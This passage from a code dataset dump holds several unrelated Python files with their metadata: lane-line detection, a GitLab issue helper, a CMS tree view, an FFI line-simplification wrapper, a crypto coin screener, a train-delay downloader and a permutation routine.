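binary = np.zeros((720, 1280), dtype=np.uint8)
binary[400:, 300:310] = 1                        # fake left lane pixels
binary[400:, 950:960] = 1                        # fake right lane pixels

histogram = np.sum(binary[binary.shape[0]//2:, :], axis=0)
midpoint = histogram.shape[0] // 2
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
print(leftx_base, rightx_base)                   # 300 950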
\n\ndef fit_polynomial(binary_warped):\n    '''\n    Fit a second-order polynomial to each lane line in a binary image and\n    draw both fits onto the plot as two yellow lines.\n    '''\n    # Find our lane pixels first\n    leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)\n\n    # Fit a second order polynomial to each using `np.polyfit`\n    left_fit = np.polyfit(lefty, leftx, 2)\n    right_fit = np.polyfit(righty, rightx, 2)\n\n    # Generate x and y values for plotting\n    ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0])\n    try:\n        left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n        right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n    except TypeError:\n        # Avoids an error if `left_fit` and `right_fit` are still None or incorrect\n        print('The function failed to fit a line!')\n        left_fitx = 1*ploty**2 + 1*ploty\n        right_fitx = 1*ploty**2 + 1*ploty\n\n    ## Visualization ##\n    # Colors in the left and right lane regions\n    out_img[lefty, leftx] = [255, 0, 0]\n    out_img[righty, rightx] = [0, 0, 255]\n\n    # Plots the left and right polynomials on the lane lines\n    plt.plot(left_fitx, ploty, color='yellow')\n    plt.plot(right_fitx, ploty, color='yellow')\n\n    return out_img, left_fit, right_fit\n\n\ndef calibration_params_cal():\n    '''\n    Calibrate the camera with the chessboard images in 'camera_cal' and\n    return the calibration parameters.\n    '''\n    # Read in and make a list of calibration images\n    images = glob.glob('./camera_cal/calibration*.jpg')\n\n    # Arrays to store object points and image points from all the images\n    objpoints = []\n    imgpoints = []\n\n    # Prepare object points\n    objp = np.zeros((6*9, 3), np.float32)\n    objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)\n\n    for fname in images:\n        # Read in each image\n        img = mpimg.imread(fname)\n\n        # Convert image to grayscale (mpimg.imread returns RGB)\n        gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n        # Find the chessboard corners\n        ret, corners = cv2.findChessboardCorners(gray, (9, 6), None)\n\n        # If corners are found, add object points, image points\n        if ret:\n            imgpoints.append(corners)\n            objpoints.append(objp)\n\n            # Draw and display the corners\n            img = cv2.drawChessboardCorners(img, (9, 6), corners, ret)\n    ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(\n        objpoints, imgpoints, gray.shape[::-1], None, None)\n\n    return ret, mtx, dist, rvecs, tvecs\n\n\ndef undistort_image(img, mtx, dist):\n    undist = cv2.undistort(img, mtx, dist, None, mtx)\n    return undist\n\n\ndef image_process(input_image, output_image, mtx, dist):\n    left_fit = Line()\n    right_fit = Line()\n\n    # Define conversions in x and y from pixel space to meters\n    ym_per_pix = 30/720  # meters per pixel in y dimension\n    xm_per_pix = 3.7/700  # meters per pixel in x dimension\n\n    left_fit.current_fit = np.array([0.0, 0.0, 300.0])\n    right_fit.current_fit = np.array([0.0, 0.0, 900.0])\n\n    image = mpimg.imread(input_image)\n    # input_clip = VideoFileClip(input_video).set_duration(3.0)\n\n    def process_image(image):\n\n        # Step 1: Undistort each frame\n        img = undistort_image(image, mtx, dist)\n\n        # Step 2: Convert the undistorted frame into a binary image that shows the\n        # lane lines clearly, combining the LAB b-channel and LUV L-channel thresholds\n        color_binary, thresholded_binary = pipeline(img, lab_b_thresh=(145, 200), luv_l_thresh=(215, 255))\n\n        # Step 3: Convert the image into a top-down view to calculate the curvature and fit the polynomials\n        warped_thresholded_binary, M, Minv = warp(thresholded_binary)\n\n        # Step 4: Find the lane lines\n        # out_img, left_fit.current_fit, right_fit.current_fit = fit_polynomial(warped_thresholded_binary)\n        result, left_curverad, right_curverad, left_curverad_real, right_curverad_real, left_fit.current_fit, right_fit.current_fit = search_around_poly(\n            warped_thresholded_binary, left_fit=left_fit.current_fit, right_fit=right_fit.current_fit)\n\n        left_fit.radius_of_curvature = left_curverad_real\n        right_fit.radius_of_curvature = right_curverad_real\n\n        # Step 5: Display the lane lines on the image\n        yMax = img.shape[0]\n        ploty = np.linspace(0, yMax - 1, yMax)\n        color_warp = np.zeros_like(img).astype(np.uint8)\n\n        # Step 5.1: Calculate points.\n        left_fitx = left_fit.current_fit[0]*ploty**2 + \\\n            left_fit.current_fit[1]*ploty + left_fit.current_fit[2]\n        right_fitx = 
right_fit.current_fit[0]*ploty**2 + \\\n right_fit.current_fit[1]*ploty + right_fit.current_fit[2]\n\n # Step 5.2: Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array(\n [np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Step 5.3: Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n\n # Step 5.4: Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(\n color_warp, Minv, (img.shape[1], img.shape[0]))\n result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)\n\n # Step 6: Display the lane lines info on the image\n left_curve_base = left_fit.current_fit[0] * image.shape[0] ** 2 + \\\n left_fit.current_fit[1] * image.shape[0] + left_fit.current_fit[2]\n right_curve_base = right_fit.current_fit[0] * image.shape[0] ** 2 + \\\n right_fit.current_fit[1] * \\\n image.shape[0] + right_fit.current_fit[2]\n car_offset = ((left_curve_base + right_curve_base) /\n 2 - image.shape[1] / 2) * xm_per_pix\n text1 = \"Curvature radius (left, right) = (\" + str(\n left_fit.radius_of_curvature) + \"m, \" + str(right_fit.radius_of_curvature) + \"m)\"\n text2 = \"Car offset = \" + str(car_offset) + \"m\"\n cv2.putText(result, text1, (40, 50),\n cv2.FONT_HERSHEY_PLAIN, 2.0, (0, 0, 255), 2)\n cv2.putText(result, text2, (40, 100),\n cv2.FONT_HERSHEY_PLAIN, 2.0, (0, 0, 255), 2)\n\n # Step 7: Return the processed image\n return result\n\n \n result = process_image(image)\n result = cv2.cvtColor(result, cv2.COLOR_RGB2BGR)\n cv2.imwrite(output_image, result)\n\nif __name__ == \"__main__\":\n\n # Step 1: Calibrate the camera, get the calibration params\n ret, mtx, dist, rvecs, tvecs = calibration_params_cal()\n\n # Step 2: Processing the video frame by frame\n input_image = './test_images/test2.jpg'\n output_image = './output_images/lane_area_add_on_original_image.jpg'\n image_process(input_image, output_image, mtx, dist)\n # # Read an image\n","sub_path":"carND-LaneLines-P2-resubmit-part-3.py","file_name":"carND-LaneLines-P2-resubmit-part-3.py","file_ext":"py","file_size_in_byte":20332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"516785591","text":"\"\"\"\nCode for interacting with a gitlab instance.\n\"\"\"\nimport yaml\nimport time\n\nfrom .event import Event\nfrom . 
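The car-offset line above is plain arithmetic: the lane centre (mean of the two fitted base x positions) minus the image centre, scaled to metres; worked once with round numbers:

xm_per_pix = 3.7 / 700                 # as defined in the record
left_base, right_base = 300.0, 1000.0  # illustrative fitted base x positions
width = 1280
car_offset = ((left_base + right_base) / 2 - width / 2) * xm_per_pix
print(f"{car_offset:.2f} m")           # 0.05 m: lane centre sits right of image centre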
import config\nimport gitlab\n\nimport re\nimport datetime\n\nfrom liquid import Liquid\n\nSTATE_PREFIX = \"C01\"\n\ndef find_events(repository, milestone=None, subset=None, update=False, repo=True, label=None):\n \"\"\"\n Search through a repository's issues and find all of the ones\n for events.\n \"\"\"\n if subset == [None]:\n subset = None\n if not label:\n event_label = config.get(\"gitlab\", \"event_label\")\n else:\n event_label = label\n try:\n sleep_time = int(config.get(\"gitlab\", \"rest_time\"))\n except:\n sleep_time = 30\n issues = repository.issues.list(labels=[event_label], \n #milestone=milestone,\n per_page=1000)\n output = []\n if subset:\n for issue in issues:\n if issue.title in subset:\n output += [EventIssue(issue, repository, update, repo=repo)]\n if update:\n time.sleep(sleep_time)\n else:\n for issue in issues:\n output += [EventIssue(issue, repository, update, repo=repo)]\n if update:\n time.sleep(sleep_time)\n return output\n\n\nclass EventIssue:\n \"\"\"\n Use an issue on the gitlab issue tracker to \n hold variable data for the program.\n\n Parameters\n ----------\n issue : `gitlab.issue`\n The issue which represents the event.\n update : bool\n Flag to determine if the git repository is updated \n when it is loaded. Defaults to False to prevent\n excessive load on the git server.\n \"\"\"\n\n def __init__(self, issue, repository, update=False, repo=True):\n\n self.issue_object = issue\n self.title = issue.title\n self.text = issue.description\n \n self.issue_id = issue.id\n self.labels = issue.labels\n self.data = self.parse_notes()\n if repo:\n self.repository = repository\n else:\n self.repository = None\n self.event_object=None\n self.event_object = Event.from_issue(self, update, repo=repo)\n \n\n def _refresh(self):\n if self.repository:\n self.issue_object = self.repository.issues.get(self.issue_object.iid)\n if self.event_object:\n self.event_object.text = self.issue_object.description.split(\"---\")\n else:\n pass\n\n @classmethod\n def create_issue(cls, repository, event_object, issue_template=None):\n \"\"\"\n Create an issue for an event.\n \"\"\"\n\n if issue_template:\n with open(issue_template, \"r\") as template_file:\n liq = Liquid(template_file.read())\n rendered = liq.render(event_object=event_object, yaml = event_object.to_yaml())\n else:\n rendered = event_object.to_yaml()\n \n repository.issues.create({'title': event_object.name,\n 'description': rendered})\n \n @property\n def productions(self):\n \"\"\"List the productions on this event.\"\"\"\n return self.event_object.productions\n \n @property\n def state(self):\n \"\"\"\n Get the state of the event's runs.\n \"\"\"\n for label in self.issue_object.labels:\n if f\"{STATE_PREFIX}::\" in label:\n return label[len(STATE_PREFIX)+2:]\n return None\n\n @state.setter\n def state(self, state):\n \"\"\"\n Set the event state.\n \"\"\"\n self._refresh()\n for label in self.issue_object.labels:\n if f\"{STATE_PREFIX}::\" in label:\n # Need to remove all of the other scoped labels first.\n self.issue_object.labels.remove(label)\n self.issue_object.labels += [\"{}::{}\".format(STATE_PREFIX, state)]\n self.issue_object.save()\n\n def add_note(self, text):\n \"\"\"\n Add a comment to the event issue.\n A footer will be added to identify this as being created by the \n supervisor and not the user.\n \"\"\"\n self._refresh()\n now = datetime.datetime.now()\n header = \"\"\"\"\"\"\n footer = f\"\"\"\\nAdded at {now:%H}:{now:%M}, {now:%Y}-{now:%m}-{now:%d} by the run supervision robot :robot:.\"\"\"\n 
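create_issue above optionally pushes the event through a Liquid template before filing the issue; a minimal sketch of that render step, with the template text inlined rather than read from issue_template and illustrative field names:

from liquid import Liquid

template = "# {{ name }}\n\n---\n{{ yaml }}"
liq = Liquid(template)
# Context keys are passed as keyword arguments, mirroring the call in create_issue.
print(liq.render(name="GW150914", yaml="interferometers: [H1, L1]"))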
self.issue_object.notes.create({\"body\": header+text+footer})\n self.issue_object.save()\n\n def add_label(self, label, state=True):\n \"\"\"\n Add a new label to an event issue.\n\n Parameters\n ----------\n label : str \n The name of the label.\n \"\"\"\n self._refresh()\n if state:\n self.issue_object.labels += [f\"{STATE_PREFIX}:{label}\"]\n else:\n self.issue_object.labels += [f\"{label}\"]\n \n self.issue_object.save()\n \n def update_data(self):\n \"\"\"\n Store event data in the comments on the event repository.\n \"\"\"\n self._refresh()\n\n self.issue_object.description = self.event_object.to_issue()\n\n self.issue_object.save()\n\n def parse_notes(self):\n \"\"\"\n Read issue information from the comments on the issue.\n\n Only notes which start\n ```\n # Run information\n ```\n will be parsed.\n \"\"\"\n data = {}\n keyval = r\"([\\w]+):[\\s]*([ \\w\\#\\/\\,\\.-]+)\"\n notes = self.issue_object.notes.list(per_page=200)\n note_data = []\n for note in reversed(notes):\n if \"---\\n\" in note.body:\n data = note.body.split(\"---\")\n if len(data)>0: \n data=data[1]\n else: \n continue\n data = yaml.safe_load(data)\n note_data.append(data)\n return note_data\n","sub_path":"asimov/gitlab.py","file_name":"gitlab.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556215346","text":"# Copyright (c) 2010 gocept gmbh & co. kg\n# See also LICENSE.txt\n\nimport StringIO\nimport asm.cms.edition\nimport asm.cmsui.interfaces\nimport cgi\nimport grok\nimport zope.component\nimport zope.copypastemove.interfaces\n\nBRANCH_STATE_CLOSED = False\nBRANCH_STATE_OPEN = True\n# We don't have any children.\nBRANCH_STATE_NONE = None\n\nclass Tree(grok.View):\n\n grok.context(grok.Application) # XXX Meh.\n grok.layer(asm.cmsui.interfaces.ICMSSkin)\n grok.require('asm.cms.EditContent')\n\n parent = None\n open_page = None\n\n def update(self, parent_id=None, page_id=None):\n self.request.response.setHeader('Content-Type', 'text/xml')\n if parent_id is None:\n self.parent = self.context\n else:\n iids = zope.component.getUtility(zope.intid.interfaces.IIntIds)\n self.parent = iids.getObject(int(parent_id))\n\n # Page ID is used to give enough data in initial tree that the branch\n # that has currently open page is also transmitted in the initial\n # data request.\n #\n # On subsequent calls when opening branches, page_id is not transmitted\n # any more and parent_id is transmitted instead.\n if page_id is not None:\n iids = zope.component.getUtility(zope.intid.interfaces.IIntIds)\n page = iids.getObject(int(page_id))\n self.open_page = page\n\n\n def _get_page_data(self, page):\n intids = zope.component.getUtility(zope.intid.IIntIds)\n edition = asm.cms.edition.select_edition(page, self.request)\n\n if isinstance(edition, asm.cms.edition.NullEdition):\n ref = page\n title = page.__name__\n else:\n ref = edition\n title = edition.title\n\n page_id = intids.getId(page)\n if title is None:\n title = u''\n\n state = BRANCH_STATE_NONE\n if len(list(page.subpages)) > 0:\n state = BRANCH_STATE_CLOSED\n\n parent_id = None\n if page != self.context:\n parent_id = intids.getId(page.__parent__)\n\n return {\n 'rel': page.type,\n 'id': page_id,\n 'parent_id': parent_id,\n 'state': state,\n 'url': self.url(ref),\n 'title': title,\n 'name': page.__name__,\n }\n\n def _page_to_xml(self, page):\n parent_str = \"\"\n if page['parent_id'] is not None:\n parent_str = 'parent_id=\"%s\"' % page['parent_id']\n\n state_str = \"\"\n 
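The state property above encodes run state as a single scoped label, C01::<state>; the list manipulation on its own, with a plain list standing in for the issue's labels:

STATE_PREFIX = "C01"

def set_state(labels, state):
    # Drop any existing scoped state label, then append the new one.
    labels = [l for l in labels if not l.startswith(f"{STATE_PREFIX}::")]
    return labels + [f"{STATE_PREFIX}::{state}"]

print(set_state(["event", "C01::ready"], "running"))   # ['event', 'C01::running']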
if page['state'] is not BRANCH_STATE_NONE:\n if page['state'] == BRANCH_STATE_OPEN:\n state_str = 'state=\"open\"'\n elif page['state'] == BRANCH_STATE_CLOSED:\n state_str = 'state=\"closed\"'\n\n return \"\"\"\n%(title)s\n\n\"\"\" % {'rel': page['rel'],\n 'parent_str': parent_str,\n 'id': page['id'],\n 'state_str': state_str,\n 'url': page['url'],\n 'title': cgi.escape(page['title']),\n 'name': cgi.escape(page['name']),\n }\n\n def _sub_pages(self, parent):\n pages = []\n for sub in parent.subpages:\n pages.append(self._get_page_data(sub))\n return pages\n\n def _open_branches_leading_to_open_page(self, pages):\n open_page = self.open_page\n if open_page is None:\n return pages\n\n intids = zope.component.getUtility(zope.intid.IIntIds)\n opened_ids = []\n while self.context != open_page:\n pages.extend(self._sub_pages(open_page))\n open_page = open_page.__parent__\n opened_ids.append(intids.getId(open_page))\n\n for page in pages:\n if page['id'] in opened_ids:\n page['state'] = BRANCH_STATE_OPEN\n\n return pages\n\n\n def tree(self):\n pages = []\n # When we are opening the tree for the first time, we don't have\n # anything in tree and we need to add the root node specifically.\n if self.parent == self.context:\n pages = [self._get_page_data(self.parent)]\n pages.extend(self._sub_pages(self.parent))\n\n pages = self._open_branches_leading_to_open_page(pages)\n\n result = StringIO.StringIO()\n result.write(\"\\n\")\n for page in pages:\n result.write(self._page_to_xml(page))\n result.write(\"\\n\")\n return result.getvalue()\n","sub_path":"src/asm/cmsui/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"643425771","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nffi.py\n\nCreated by Stephan Hügel on 2016-08-3\n\nThis file is part of rdp.\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 Stephan Hügel\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
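The XML assembly above relies on Python 2's cgi.escape (the module also uses the Python 2 StringIO); a hypothetical Python 3 port of just the escaping step, not part of this record, would use html.escape:

import html

title = 'R&D <draft> "page"'
# quote=True also escapes double quotes, which matters inside an attribute value.
print('<item title="%s"/>' % html.escape(title, quote=True))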
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n\"\"\"\n\nimport os\nfrom sys import platform\nfrom ctypes import Structure, POINTER, c_void_p, c_size_t, c_double, cast, cdll\nimport numpy as np\n\nfile_path = os.path.dirname(__file__)\nprefix = {'win32': ''}.get(platform, 'lib')\nextension = {'darwin': '.dylib', 'win32': '.dll'}.get(platform, '.so')\n\nlib = cdll.LoadLibrary(os.path.join(file_path, \"target/release\", prefix + \"rdp\" + extension))\n\nclass _FFIArray(Structure):\n \"\"\"\n Convert sequence of float lists to a C-compatible void array\n example: [[1.0, 2.0], [3.0, 4.0]]\n\n \"\"\"\n _fields_ = [(\"data\", c_void_p),\n (\"len\", c_size_t)]\n\n @classmethod\n def from_param(cls, seq):\n \"\"\" Allow implicit conversions \"\"\"\n return seq if isinstance(seq, cls) else cls(seq)\n\n def __init__(self, seq, data_type = c_double):\n self.data = cast(\n np.array(seq, dtype=np.float64).ctypes.data_as(POINTER(data_type)),\n c_void_p\n )\n self.len = len(seq)\n\n\nclass _CoordResult(Structure):\n \"\"\" Container for returned FFI coordinate data \"\"\"\n _fields_ = [(\"coords\", _FFIArray)]\n\ndef _void_array_to_nested_list(res, _func, _args):\n \"\"\" Dereference the FFI result to a list of coordinates \"\"\"\n try:\n shape = res.coords.len, 2\n ptr = cast(res.coords.data, POINTER(c_double))\n array = np.ctypeslib.as_array(ptr, shape)\n return array.tolist()\n finally:\n drop_array(res.coords)\n\nsimplify_coords = lib.simplify_rdp_ffi\nsimplify_coords.argtypes = (_FFIArray, c_double)\nsimplify_coords.restype = _CoordResult\nsimplify_coords.errcheck = _void_array_to_nested_list\n\nsimplify_coords_vw = lib.simplify_visvalingam_ffi\nsimplify_coords_vw.argtypes = (_FFIArray, c_double)\nsimplify_coords_vw.restype = _CoordResult\nsimplify_coords_vw.errcheck = _void_array_to_nested_list\n\nsimplify_coords_vwp = lib.simplify_visvalingamp_ffi\nsimplify_coords_vwp.argtypes = (_FFIArray, c_double)\nsimplify_coords_vwp.restype = _CoordResult\nsimplify_coords_vwp.errcheck = _void_array_to_nested_list\n\ndrop_array = lib.drop_float_array\ndrop_array.argtypes = (_FFIArray,)\ndrop_array.restype = None\n\nif __name__ == \"__main__\":\n print(simplify_coords(\n [[0.0, 0.0], [5.0, 4.0], [11.0, 5.5], [17.3, 3.2], [27.8, 0.1]],\n 1.0\n ))\n","sub_path":"ffi.py","file_name":"ffi.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"28477159","text":"\"\"\"The hello command.\"\"\"\n\nfrom json import dumps\nfrom .base import Base\nfrom .utils import *\n\n\n\nclass Fly(Base):\n \"\"\"Jagging the scribble\"\"\"\n\n def run(self):\n print('This command takes an md file and jaggers it!')\n print('You supplied the following options:', dumps(self.options, indent=2, sort_keys=True))\n\n resource = self.options['']\n files_to_jagger = list()\n if os.path.isdir(resource):\n files_to_jagger = [f for f in os.listdir(resource) if assertMdFile(f)]\n elif assertMdFile(resource):\n files_to_jagger.append(resource)\n if not files_to_jagger:\n print(\"The path provided is not pointing to a valid md-File: {}\".format(resource))\n exit(-1)\n print(files_to_jagger)\n\n for file_path in files_to_jagger:\n 
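_FFIArray above hands numpy-backed memory across the FFI boundary as an opaque pointer plus a length; that conversion step shown standalone, with no compiled Rust library required:

import numpy as np
from ctypes import POINTER, c_double, c_void_p, cast

seq = [[0.0, 0.0], [5.0, 4.0], [11.0, 5.5]]
arr = np.array(seq, dtype=np.float64)   # keep a reference so the buffer stays alive
data = cast(arr.ctypes.data_as(POINTER(c_double)), c_void_p)
print(data, len(seq))                   # the (data, len) pair that _FFIArray stores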
jaggerFile(file_path)\n\n\n","sub_path":"jagger/commands/fly.py","file_name":"fly.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419954607","text":"# this screen implements bullish kickstarter, macd growth and bollinger. this screens volatility with bollinger\nimport get_positive_coin\nfrom pyti.bollinger_bands import middle_bollinger_band as mbb\nfrom pyti.bollinger_bands import lower_bollinger_band as lbb\nfrom pyti.bollinger_bands import upper_bollinger_band as ubb\nfrom pyti.moving_average_convergence_divergence import moving_average_convergence_divergence as macd\nfrom moving_average_convergence_divergence_signal_histogram import macd_signal as macds\nfrom moving_average_convergence_divergence_signal_histogram import macd_histogram as macdh\nfrom binance.client import Client\n\n\ndef screen():\n client = Client(\"api-key\", \"api-secret\", {\"verify\": False, \"timeout\": 20})\n positiveCoin = get_positive_coin.positiveCoin\n bullishKScoin = []\n for m in positiveCoin:\n candles = client.get_klines(symbol=m, interval=client.KLINE_INTERVAL_30MINUTE)\n if candles[-2][1] < candles[-2][4] <= candles[-1][1] < candles[-1][4]:\n bullishKScoin.append(m)\n\n macdCoin = []\n # for m in bullishKScoin:\n # candles = client.get_klines(symbol=m, interval=client.KLINE_INTERVAL_1HOUR)\n # close = []\n # for n in candles:\n # close.append(float(n[4]))\n # mac = macd(close, 12, 26)\n # macs = macds(mac)\n # mach = macdh(mac, macs)\n # # if mach[-1] > 0 and (macs[-1] - macs[-2]) > 0 and (mac[-1] - mac[-2]) > 0:\n # # macdCoin.append(m)\n # if mach[-1] > 0 and (macs[-1] - macs[-2]) > 0 and (mac[-1] - mac[-2]) > 0:\n # macdCoin.append(m)\n\n bollCoin = []\n for m in bullishKScoin:\n candles = client.get_klines(symbol=m, interval=client.KLINE_INTERVAL_1HOUR)\n close = []\n for n in candles:\n close.append(float(n[4]))\n lb = lbb(close, 20, 2)\n mb = mbb(close, 20, 2)\n ub = ubb(close, 20, 2)\n\n if ((ub[-1] - lb[-1])/lb[-1]) > 0.1:\n bollCoin.append(m)\n\n maxDemandRatio = 0\n buyingCoin = ''\n for m in bollCoin:\n depth = client.get_order_book(symbol=m)\n buyingVol = 0\n sellingVol = 0\n for n in depth['bids'][0:30]:\n buyingVol = buyingVol + float(n[1])\n for n in depth['asks'][0:30]:\n sellingVol = sellingVol + float(n[1])\n demandRatio = buyingVol / sellingVol\n print(demandRatio)\n print(maxDemandRatio)\n if demandRatio > maxDemandRatio:\n maxDemandRatio = demandRatio\n buyingCoin = m\n\n if maxDemandRatio < 1.5:\n buyingCoin = ''\n\n print(bullishKScoin)\n print(macdCoin)\n print(bollCoin)\n print(buyingCoin)\n return buyingCoin\n","sub_path":"screen3.py","file_name":"screen3.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402658463","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Babel localisation support for aiohttp\n 代码从 https://github.com/jie/aiohttp_babel 拷贝并修改\n\"\"\"\nfrom setuptools import setup\nfrom setuptools import find_packages\nimport os\n\ndef read(f):\n return open(os.path.join(os.path.dirname(__file__), f),encoding='utf8').read().strip()\n\nsetup(\n name = \"mw-aiohttp-babel\",\n version = \"0.1.7\",\n packages = find_packages(),\n install_requires = [\n \"aiohttp\",\n \"babel\",\n \"speaklater\",\n ],\n author = \"cxhjet\",\n author_email = \"cxhjet@qq.com\",\n description = \"Babel localisation support for aiohttp,适用maxwin团队的开发框架\",\n long_description='\\n\\n'.join((read('README.rst'), 
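The demand-ratio screen above reduces to summed bid volume over summed ask volume across the top 30 book levels; the same computation with a stub order book in place of client.get_order_book:

depth = {
    "bids": [["100.0", "2.0"], ["99.9", "1.5"]],   # [price, quantity] pairs
    "asks": [["100.1", "1.0"], ["100.2", "0.5"]],
}
buying_vol = sum(float(qty) for _, qty in depth["bids"][:30])
selling_vol = sum(float(qty) for _, qty in depth["asks"][:30])
print(buying_vol / selling_vol)   # 2.33...: bids outweigh asks, above the 1.5 cut-off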
read('CHANGES.txt'))),\n license = \"BSD\",\n keywords = \"aiohttp locale babel localisation\",\n url = \"https://bitbucket.org/maxwin-inc/mw-aiohttp-babel/src\",\n)\n","sub_path":"pypi_install_script/mw-aiohttp-babel-0.1.7.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"377272353","text":"import mysql.connector\nfrom ptx import PTX\nfrom dotenv import load_dotenv\nfrom os import environ as ENV\n\n\nload_dotenv()\n\nptx = PTX(ENV['APP_ID'], ENV['APP_KEY'])\nresponse_data = ptx.get('/Rail/TRA/LiveTrainDelay', {'$format': 'JSON'}).json()\n\nconn = mysql.connector.connect(user=ENV['DB_USER'], password=ENV['DB_PASSWORD'],\n host=ENV['DB_HOST'], port=ENV['DB_PORT'],\n database=ENV['DB_NAME'])\ncursor = conn.cursor()\n\ndb_creation_sql = '''\n CREATE TABLE IF NOT EXISTS\n delay_infos (\n train_id INT,\n station_id INT,\n delay_time INT,\n updated_at TIMESTAMP,\n PRIMARY KEY (train_id, station_id, updated_at)\n )\n'''\ncursor.execute(db_creation_sql)\n\ninsertion_sql = '''\n INSERT IGNORE INTO delay_infos\n (train_id, station_id, delay_time, updated_at)\n VALUES\n (%s, %s, %s, %s)\n'''\n\nfor entry in response_data:\n delay_time = int(entry['DelayTime'])\n\n train_id = int(entry['TrainNo'])\n station_id = int(entry['StationID'])\n updated_at = entry['SrcUpdateTime']\n params = (train_id, station_id, delay_time, updated_at)\n cursor.execute(insertion_sql, params)\n\nconn.commit()\n\ncursor.close()\nconn.close()\n","sub_path":"download_delay_info.py","file_name":"download_delay_info.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"566105188","text":"from typing import List\n\n# if I have a sub list of ascending order, it's the smallest value\n# find inversion point just before the sub list\n# swap the biggest val in sub list that < inversion\n# reverse the sub list to make it biggest\n\ndef prev_permutation(perm: List[int]) -> List[int]:\n # find inversion point perm[i] > perm[i+1]\n i = len(perm) - 2\n while (i >= 0 and perm[i] <= perm[i+1]):\n i -= 1\n\n if i == -1:\n return []\n\n # swap perm[i] with biggest val after perm[i]\n # that < perm[i]\n for j in reversed(range(len(perm))):\n if perm[j] < perm[i]:\n perm[j], perm[i] = perm[i], perm[j]\n break\n\n perm[i+1:] = reversed(perm[i+1:])\n return perm\n \nif __name__ == '__main__':\n for perm in ([0,1,2], [2,1,0], [0,2,1]):\n print(prev_permutation(perm))","sub_path":"list/prev_permutation.py","file_name":"prev_permutation.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"460233416","text":"# Copyright 2019 NEC Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport cgi # CGIモジュールのインポート\nimport cgitb\nimport sys\nimport requests\nimport json\nimport subprocess\nimport traceback\nimport os\nimport 
